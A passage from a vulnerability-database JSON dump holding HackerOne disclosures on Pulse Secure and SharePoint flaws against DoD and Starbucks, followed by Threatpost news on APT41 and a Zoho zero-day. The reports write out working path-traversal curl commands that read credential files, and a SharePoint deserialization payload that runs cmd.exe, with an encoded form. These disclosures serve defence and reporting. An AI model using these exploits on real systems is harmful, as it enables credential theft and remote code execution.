"qualysblog", "title": "Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-05-07T17:56:52", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "**Summary:**\nThe Navy has a Pulse Secure SSL VPN (https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:\nCVE-2019-11510 - Pre-auth Arbitrary File Reading\nCVE-2019-11539 - Post-auth Command Injection\n\nvulnerable hostname from ssl certificate: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.navy.mil\n\nThe pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an un-authenicated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This files contains admin and other users credentials in plain-text format. This information can be used to log into the pulse device as an administrator.\n\nOnce logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker to execute commands on the device. Commands execution could lead to compromise to other servers on the network or malware implantation.\n\nThere was a talk recently at Blackhat USA that goes into great detail of the vulnerabilities and how to exploit them.\n\nExploit code was recently released to the public for this vulnerability. I would consider this an extremely critical issue, and others will be scanning your network trying to compromise this. The Pulse Secure version can be obtained from your device via a publicly available file here (https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/nc/nc_gina_ver.txt), so it is really easy to detect for attackers.\n\nHere are links to Blackhat presentation, Pulse Secure Security Bulletin, exploit code, video of exploit code in action and example report found on twitter's network.\n\nBlackhat 2019 Presentation\nhttps://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf\n\nPulse Secure Security Bulletin\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\nPublicly available exploit code:\nhttps://raw.githubusercontent.com/projectzeroindia/CVE-2019-11510/master/CVE-2019-11510.sh\n\nVideo of how exploit works:\nhttps://www.youtube.com/watch?v=v7JUMb70ON4&feature=youtu.be\n\nExample report found on Twitter's network\nhttps://hackerone.com/reports/591295\n\n## Impact\nCritical - I would consider this an extremely critical issue, and others will be scanning your network trying to compromise this.\n\n## Step-by-step Reproduction Instructions\n1. From macos/linux command line issue the following command;\ncurl --path-as-is -s -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/\"\n\nThis will display the /etc/passwd file from the pulse secure device. This in itself it enough to confirm the presence of both vulnerabilities.\n\nI've attached screenshots of getting the vulnerable Pulse Secure version from the device, and confirming the arbitrary file read vulnerability. I did not attempt to login into your device as administrator. Reading /etc/passwd is enough to confirm the vulnerability exists.\n\n## Product, Version, and Configuration (If applicable)\nPulse Secure 9.0.1.63949\n\n## Suggested Mitigation/Remediation Actions\nInstall updated firmware/os from the Pulse Secure Security Bulletin\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\n## Impact\n\nAn attacker could compromise this device, and gain access to the DoD networks, compromise other servers, or implant malware.", "modified": "2020-05-07T16:57:13", "published": "2019-08-23T15:57:54", "id": "H1:680480", "href": "https://hackerone.com/reports/680480", "type": "hackerone", "title": "U.S. Dept Of Defense: Command Injection (via CVE-2019-11510 and CVE-2019-11539)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-27T22:24:56", "bulletinFamily": "bugbounty", "bounty": 4000.0, "description": "l00ph0le discovered an endpoint on the Store Development Resource Center site at https://sdrc.starbucks.com/_layouts/15/picker.aspx was vulnerable to a deserialization RCE in Microsoft Sharepoint per CVE-2019-0604.\n\n@l00ph0le \u2014 thank you for reporting this vulnerability, your patience while we applied the patch and for confirming the resolution.", "modified": "2019-12-12T21:52:55", "published": "2019-04-11T20:27:05", "id": "H1:536134", "href": "https://hackerone.com/reports/536134", "type": "hackerone", "title": "Starbucks: Store Development Resource Center was vulnerable to a Remote Code Execution - Unauthenticated Remote Command Injection (CVE-2019-0604)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-11T18:05:00", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "**Summary:**\nMicrosoft recently released a patch for CVE-2019-0604. This vulnerability is caused by the Microsoft SharePoint application deserializing untrusted data from a user.\n\nThis means an attacker can send a specially crafted/encoded parameter to a Microsoft SharePoint URL, and it will allow Remote Code Execution or Command Injection on the server.\n\nThis is an in-depth blog post about the vulnerability.\nhttps://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability\n\nThe \u2588\u2588\u2588\u2588 SharePoint site suffers from this vulnerability. The URL for the main site is: https://\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/OrgStruct/StandingGroups/Pages/default.aspx \n\n**Description:**\n\n## Impact\nThe impact is high. Using the steps below an attacker can run any windows command line on the SharePoint server.\n\n## Step-by-step Reproduction Instructions\n\n1. Clone this github repository for the PoC code https://github.com/l00ph0le/CVE-2019-0604.git\n2. Edit the second \"<System:String>/c calc</System:String>\" in t.xml to the command you would like to execute on the windows server. I edited mind to send a ping request to a ubuntu server hosted on the Internet. The final file looks like this:\n\n<ResourceDictionary\nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\nxmlns:System=\"clr-namespace:System;assembly=mscorlib\"\nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n\t<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n\t\t<ObjectDataProvider.MethodParameters>\n\t\t\t<System:String>cmd.exe</System:String>\n\t\t\t<System:String>/c ping cloudbox2.legithost.info</System:String>\n\t\t</ObjectDataProvider.MethodParameters>\n\t</ObjectDataProvider>\n</ResourceDictionary>\n\n3. User \"ConsoleApplication1.exe\" to generate the encoded payload like this:\nc:/>cd c:\\CVE-2019-0604\\ConsoleApplication1\\ConsoleApplication1\\bin\\Debug\\\n\nc:/CVE-2019-0604\\ConsoleApplication1\\ConsoleApplication1\\bin\\Debug\\>ConsoleApplication1.exe c:/CVE-2019-0604/t.xml\n\n4. This will produce an encoded string that begins with \"__\", copy this string.\n\n5. Setup an Interception proxy (BurpSuite). \n\n6. Browse to the vulnerable URL:\nhttps://\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588/OrgStruct/StandingGroups/_layouts/15/picker.aspx?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,%20Microsoft.SharePoint,%20Version=15.0.0.0,%20Culture=neutral,%20PublicKeyToken=71e9bce111e9429c\n\n7. When the \"Picker.aspx\" page loads, click the hour glass in the right hand corner, and stop the request with burp suite. In the request look for the parameter \"ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=\", and set the value to the encoded string you generated with ConsoleAPplication1.exe. Leave the request paused. The string will look something like this:\n\n__bp4b7135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e600160027009700d000a0008700d600c600e6003700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e6002200d000a0008700d600c600e6003700a3008700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c6002200d000a0008700d600c600e6003700a30035009700370047005600d600d30022003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c600960026002200d000a0008700d600c600e6003700a3004400960016007600d30022003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6002200620076004700b300d000a00090006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3002200c40016005700e600360086003400d600460022000200f4002600a6005600360047004500970007005600d3002200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70022000200d400560047008600f6004600e4001600d6005600d3002200350047001600270047002200620076004700b300d000a000900090006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a0009000900090006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d6004600e2005600870056006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a0009000900090006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f2003600020007009600e600760002003600c600f600570046002600f60087002300e200c60056007600960047008600f60037004700e2009600e6006600f6006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a000900090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a00090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b300d000a0006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300\n\n8. Setup a linux box on the internet with tcpdump to list for icmp requests. Using the following command (my network interface is called venet0, yours will be different) :\ntcpdump -nni venet0 -e icmp[icmptype] == 8\n\n9. Allow the request to go through with BurpSuite, the ping command will execute and you will see the ping requests come to you linux server from a source IP address of: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nSee attached video for a walk through of exploitation. Please reach out if you have any additional questions.\n\n## Product, Version, and Configuration (If applicable)\nThe vulnerability affects four versions of SharePoint. So you may have more exposure.\nMicrosoft SharePoint Enterprise Server 2016\t\nMicrosoft SharePoint Foundation 2013 Service Pack 1\nMicrosoft SharePoint Server 2010 Service Pack 2\nMicrosoft SharePoint Server 2019\n\n## Suggested Mitigation/Remediation Actions\nInstall the SharePoint Security Patches Released by Microsoft on March 12th found here:\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604\n\n## Impact\n\nAn attacker could compromise the windows server that SharePoint is running on. This vulnerability will grant command line server access in the context of the user that SharePoint services are running as. Even if a low privileged user is being utilized for SharePoint services, it gives an attacker a foothold for privilege escalation or moving laterally through the network that the SharePoint server resides on.", "modified": "2020-05-11T16:53:43", "published": "2019-04-10T19:54:33", "id": "H1:534630", "href": "https://hackerone.com/reports/534630", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution - Unauthenticated Remote Command Injection (via Microsoft SharePoint CVE-2019-0604)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-02T20:29:48", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "**Summary:**\nPulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE\n**Description:**\nCVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd. \nhttps://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\nThough the impact of that is very limited, medium to high sec at best. From here we can grab a specific file.\n\nThe file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I would log in then exploit a Post auth exploit.\n\n\nHere's a list of files that an attacker would instantly hit\n/data/runtime/mtmp/system\n/data/runtime/mtmp/lmdb/dataa/data.mdb\n/data/runtime/mtmp/lmdb/dataa/lock.mdb\n/data/runtime/mtmp/lmdb/randomVal/data.mdb\n/data/runtime/mtmp/lmdb/randomVal/lock.mdb\n## Impact\nCritical \n## Step-by-step Reproduction Instructions\nWe can only do this using due to browsers messing up the exploit\n\ncurl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n## Product, Version, and Configuration (If applicable)\nPulse Secure\n## Suggested Mitigation/Remediation Actions\nPatch pulse immediately\n\n## Impact\n\nAn attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user login. This also an attacker to access highly sensitive internal areas and even can perform command execution", "modified": "2019-12-02T19:29:23", "published": "2019-08-12T14:34:14", "id": "H1:671749", "href": "https://hackerone.com/reports/671749", "type": "hackerone", "title": "U.S. Dept Of Defense: Pulse Secure File disclosure, clear text and potential RCE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-05-29T21:52:52", "bulletinFamily": "info", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-03-25T15:57:25", "published": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:44:24", "bulletinFamily": "info", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "modified": "2020-03-06T16:53:00", "published": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-26T21:57:54", "bulletinFamily": "info", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore 